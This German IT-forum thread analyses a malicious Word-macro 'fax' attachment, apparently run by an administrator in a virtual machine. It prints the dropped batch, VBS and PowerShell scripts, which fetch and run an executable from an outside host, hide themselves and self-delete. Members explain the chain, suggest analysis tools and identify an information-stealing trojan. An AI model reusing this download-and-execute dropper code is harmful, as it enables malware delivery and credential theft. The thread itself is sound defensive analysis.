Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Kann mir das jemand erläutern?

Frage Sicherheit Viren und Trojaner

Mitglied: Xaero1982

Xaero1982 (Level 3) - Jetzt verbinden

07.11.2014, aktualisiert 10.11.2014, 1699 Aufrufe, 15 Kommentare

Moin,

heute ist ne Mail reingetrudelt - ein "Fax" welches man mit Word öffnen sollte und die Makros aktivieren sollte.

-> VM an -> Office drauf -> Spaß

Im Ordner C:\Windows\Temp wurden folgende Dateien angelegt:

444.exe -> Details: Gpg4Win V.2.2.2.4 Copyright 2008 g10 Code GmbH 546kb
adobeacd-update.bat

01.
@echo off 
02.
ping 1.1.2.2 -n 2 
03.
cscript.exe "c:\windows\temp\adobeacd-update.vbs" 
04.
exit
adobeacd-update.vbs
01.
currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName))) 
02.
caisudkasdknadsklasdjaklajksjklasdkjlajkalkadsjasjklajklah38e = "231" 
03.
Set objFSO=CreateObject("Scripting.FileSystemObject") 
04.
currentFile = "c:\windows\temp\adobeacd-update.ps1" 
05.
caisudkh38e = "231" 
06.
quid8hiqje = "231" 
07.
Set objShell = CreateObject("Wscript.shell") 
08.
caksjhdjaskdhakjshdjkashkjdhaksjdhkjashdjkashdjkashdjkashdjakdahjksd = "231" 
09.
objShell.run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true 
10.
caisudkhlkasdjkdlskjldsajkldasjkdsajkldasklsadklwqiodiqwjd38e = "231"
adobeacd-update.ps1
01.
$hashroot = '47-ab-cd-f5-8f-bf-f9-1f-94-65-51-7b-96-ea-13-d3'; 
02.
$hash = '0'; 
03.
$down = New-Object System.Net.WebClient; 
04.
$url  = 'http://idtvietnam.vn/images/ork.exe'; 
05.
$hashasd = 'asdjäæûôîâäëôûîâäôûkhasjkdhajkshdiusakhdsakhdkjashd'; 
06.
$file = 'c:\windows\temp\444.exe'; 
07.
$hashasd = 'asdjkhasjkdhajkshdiusakhdsakhdkjashd'; 
08.
$down.DownloadFile($url,$file); 
09.
$ScriptDir = $MyInvocation.ScriptName; 
10.
$someFilePath = 'c:\windows\temp\' + '444.exe'; 
11.
$vbsFilePath = 'c:\windows\temp\' + 'adobeacd-update.vbs'; 
12.
$batFilePath = 'c:\windows\temp\' + 'adobeacd-update.bat'; 
13.
$psFilePath = 'c:\windows\temp\' + 'adobeacd-update.ps1'; 
14.
Start-Sleep -s 10; 
15.
cmd.exe /c  'c:\windows\temp\444.exe';      
16.
$file1 = gci $vbsFilePath -Force 
17.
$file2 = gci $batFilePath -Force 
18.
$file3 = gci $psFilePath -Force 
19.
$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden 
20.
$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden 
21.
$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden 
22.
If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath } 
23.
If (Test-Path $batFilePath){ Remove-Item $batFilePath } 
24.
If (Test-Path $someFilePath){ Remove-Item $someFilePath } 
25.
Remove-Item $MyINvocation.InvocationName
Was genau macht das?
Mitglied: colinardo
LÖSUNG 07.11.2014, aktualisiert 10.11.2014
Hi Xaero,
die Batch ruft das VBS auf welches wiederum das Powershell-Script aufruft.
Das Powershell-Script macht dann folgendes:

Es lädt eine Datei von einer Webseite herunter 'http://xxxxxxxx/ork.exe'" die es unter 'c:\windows\temp\444.exe' auf dem Rechner speichert. Dann führt es die Datei 444.exe in einer Konsole aus (der Virus/Malware/ etc.). Dann versteckt es die 3 Scripte (bat/vbs/ps1) indem es den Dateien das Hidden-Attribut verpasst und löscht zum Schluss sich selber und die anderen Scripte um die Spuren zu verwischen.

Die zwischengeschobenen Hashes etc. sind nur Verwirrspiel, die haben keine Verwendung im Script, und sollen den Otto-Normaluser wohl verwirren oder den eigentlichen Code "verschleiern" . Die haben sich absolut keine Mühe gegeben, das geht wesentlich besser ... das waren dann wohl Script-Kiddie-Anfänger !

Grüße Uwe

p.s. ich hoffe die kleinen Vietnamesen tanzen jetzt nicht noch aus deiner VM hinaus
Bitte warten ..
Mitglied: Xaero1982
07.11.2014 um 22:40 Uhr
Also so wirklich klar was die 444.exe macht ist mir nicht... jedenfalls hats die VM zerlegt

VirtualMachine sagt: Ein schwerwiegender Fehler ist aufgetreten, und die Ausführung der vM wurde unterbrochen.

-> Logs gucken

Kann man rausbekommen was die 444.exe macht?

Danke erst mal

Grüße
Bitte warten ..
Mitglied: colinardo
07.11.2014, aktualisiert um 22:46 Uhr
Zitat von Xaero1982:
Kann man rausbekommen was die 444.exe macht?
  • Olydbg anwerfen
  • File durch den Disassembler jagen
  • Gleichzeitig Procmon laufen lassen

Was für lange Winterabende

Schönes Wochenende
Grüße Uwe
Bitte warten ..
Mitglied: Xaero1982
07.11.2014, aktualisiert um 22:57 Uhr
Procmon mit welchem Filter?

Danke, dir auch

Grüße

und vor allem was mach ich damit? also mit dem Ollydbg
Bitte warten ..
Mitglied: colinardo
07.11.2014, aktualisiert um 22:56 Uhr
Zitat von Xaero1982:
Procmon mit welchem Filter?
Na zuerst mal auf den Prozess 444.exe, später dann auf andere je nachdem was das Teil so macht ...
Bitte warten ..
Mitglied: Xaero1982
07.11.2014 um 23:16 Uhr
Offenbar macht der ne Menge.

Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.

Insgesamt 6149 Zugriffe.
Bitte warten ..
Mitglied: colinardo
08.11.2014, aktualisiert um 08:54 Uhr
Zitat von Xaero1982:

Offenbar macht der ne Menge.

Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.

Insgesamt 6149 Zugriffe.
wenn du jetzt noch nach Category = "Write" filterst siehst du was er eventuell verändert. Könnte aber auch ein einfacher Datendieb sein der in Dateien und Registry-Einträgen nach Passwörtern scannt und diese an den CC-Server sendet.
Lad das Teil doch einfach mal auf VirusTotal.com hoch, ob es schon in den Definitionen der AntiVirus-Hersteller verzeichnet ist.

Aber wahrscheinlich willst du damit nur etwas üben, gelle
Bitte warten ..
Mitglied: Xaero1982
08.11.2014 um 09:42 Uhr
Schau ich mal mit dem Filter... danke

Naja ich will eigentlich wissen was der Spaß macht... üben... joa auch das

https://www.virustotal.com/de/file/59b2bc1bdf983b47bad926ef3808f9493c100 ...
Bitte warten ..
Mitglied: Xaero1982
08.11.2014 um 10:04 Uhr
Das kam bei raus:

01.
"Time of Day","Process Name","PID","Operation","Path","Result","Detail" 
02.
"09:53:33,1463901","ork.exe","2380","RegSetValue","HKLM\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Log File Max Size","SUCCESS","Type: REG_SZ, Length: 12, Data: 65536" 
03.
"09:53:33,5291740","ork.exe","2380","CreateFile","C:\Users\Administrator\Desktop\","NAME INVALID","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, Write, AllocationSize: 0" 
04.
"09:53:38,4024746","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Read, Disposition: Create, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: None, AllocationSize: 0, OpenResult: Created" 
05.
"09:53:38,4027583","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Write, AllocationSize: 0, OpenResult: Overwritten" 
06.
"09:53:38,4028118","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 0, Length: 9, Priority: Normal" 
07.
"09:53:38,4029443","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 9, Length: 8" 
08.
"09:53:38,4029526","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 9, Length: 8, Priority: Normal" 
09.
"09:53:38,4029708","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 17, Length: 9" 
10.
"09:53:38,4029772","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 17, Length: 9, Priority: Normal" 
11.
"09:53:38,4029884","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 26, Length: 1" 
12.
"09:53:38,4029945","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 26, Length: 1, Priority: Normal" 
13.
"09:53:38,5466385","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0" 
14.
"09:53:38,5466503","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer","NAME NOT FOUND","" 
15.
"09:53:38,5466579","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride","NAME NOT FOUND","" 
16.
"09:53:38,5466637","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL","NAME NOT FOUND","" 
17.
"09:53:38,5466692","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect","NAME NOT FOUND","" 
18.
"09:53:38,5468236","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings","SUCCESS","Type: REG_BINARY, Length: 56, Data: 46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00" 
19.
"09:54:03,4389855","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Installer\Products\B808096432\LP","SUCCESS","Type: REG_SZ, Length: 100, Data: C:\Users\ADMINI~1\AppData\Local\Temp\1\L808096432" 
20.
 
Bitte warten ..
Mitglied: colinardo
08.11.2014, aktualisiert um 12:42 Uhr
dann schau mal was das Teil in die Temp-Datei tmp74A4.tmp schreibt, ich vermute es dupliziert sich als Backup.
Dann modifiziert es noch die Proxy-Einstellungen, um dann wahrscheinlich den Traffic über eine lokal gestarteten Proxy zu leiten der wiederum den Internet-Traffic zu den Tätern umleitet, wo diese dann Passwörter abfischen.

Aber wie gesagt, eine tiefgreifende Analyse bedeutet auf allen Schienen zu Monitoren, auch mit Wiresharkt den Netzwerktraffic zu beobachten.

Deshalb ist eine vollständige Analyse für uns hier sehr schwer.
Bitte warten ..
Mitglied: Xaero1982
08.11.2014 um 18:00 Uhr
Also damit kann sich wohl niemand nen Ei machen:

01.
[0] 
02.
LP=C:\Users\ADMINI~1\AppData\Local\Temp\L808096432 
03.
[2] 
04.
D=0 
05.
OS=Windows Server 2012  / 64 bit 
06.
FS=NTFS 
07.
VID=808096432 
08.
M=1 
09.
[1] 
10.
ID=101 
11.
D=08.11.2014 
12.
T=17:49:29 
13.
CPID=3776 
14.
CFN=C:\Users\Administrator\Desktop\ork.exe 
15.
PPID=3096 
16.
PFN=cmd.exe 
17.
CDR=C:\Users\Administrator\Desktop 
18.
CUSR=HOME\administrator 
19.
EUSR=HOME\administrator 
20.
LVL=HIGH
Nach Hause telefoniert da irgendwie nix...

Link zum runterladen der exe is oben xD
Bitte warten ..
Mitglied: colinardo
08.11.2014, aktualisiert 10.11.2014
Das ist ein Trojaner der sensitive Informationen über sein Opfer stiehlt:
http://kb.eset.com/esetkb/index?page=content&id=SOLN3471

Win32/Rovnix is a trojan that steals sensitive information. The trojan attempts to send gathered information to a remote machine. It uses techniques common among rootkits.
Die Übermittlung muss nicht immer direkt stattfinden, das lässt sich meistens erst sagen wenn man den über einen längeren Zeitraum beobachtet. Es kann auch sein das der Server schon vom
Netz genommen wurde. Ausserdem könnte er es ja über einen lokal installierten Proxy verschleiern . Das scheinen Grundlegende Infos über das System zu sein die dann irgendwann an den CC-Server geschickt werden.
Bitte warten ..
Mitglied: Xaero1982
08.11.2014 um 21:19 Uhr
Danke für den Link:

Win32/Rovnix not found
Bitte warten ..
Mitglied: C.R.S.
10.11.2014 um 16:54 Uhr
Zitat von Xaero1982:
Nach Hause telefoniert da irgendwie nix...

DNS-Request übersehen! optimalnewbie.co.uk ist aber schon länger trocken gelegt.
Bitte warten ..
Mitglied: Xaero1982
10.11.2014 um 18:12 Uhr
Könntest du recht haben, dass mir da sowas über den Weg gelaufen ist...
Bitte warten ..
Neuester Wissensbeitrag
Festplatten, SSD, Raid

12TB written pro SSD in 2 Jahren mit RAID5 auf Hyper-VServer

Erfahrungsbericht von Lochkartenstanzer zum Thema Festplatten, SSD, Raid ...

Ähnliche Inhalte
Router & Routing
gelöst Hat jemand schon einen Ubiquiti EdgeRouter im produktiven Einsatz? (6)

Frage von Kuemmel zum Thema Router & Routing ...

Datenbanken
DBSave - Jemand mit eigenen Erfahrungen? (4)

Frage von keine-ahnung zum Thema Datenbanken ...

iOS
gelöst Hat Jemand Erfahrungen mit dem iPad Pro? (8)

Frage von keine-ahnung zum Thema iOS ...

Heiß diskutierte Inhalte
Windows Userverwaltung
Ausgeschiedene Mitarbeiter im Unternehmen - was tun mit den AD Konten? (34)

Frage von patz223 zum Thema Windows Userverwaltung ...

LAN, WAN, Wireless
gelöst Server erkennt Client nicht wenn er ausserhalb des DHCP Pools liegt (28)

Frage von Mar-west zum Thema LAN, WAN, Wireless ...

LAN, WAN, Wireless
FritzBox, zwei Server, verschiedene Netze (21)

Frage von DavidGl zum Thema LAN, WAN, Wireless ...

Viren und Trojaner
Aufgepasst: Neue Ransomware Goldeneye verbreitet sich rasant (20)

Link von Penny.Cilin zum Thema Viren und Trojaner ...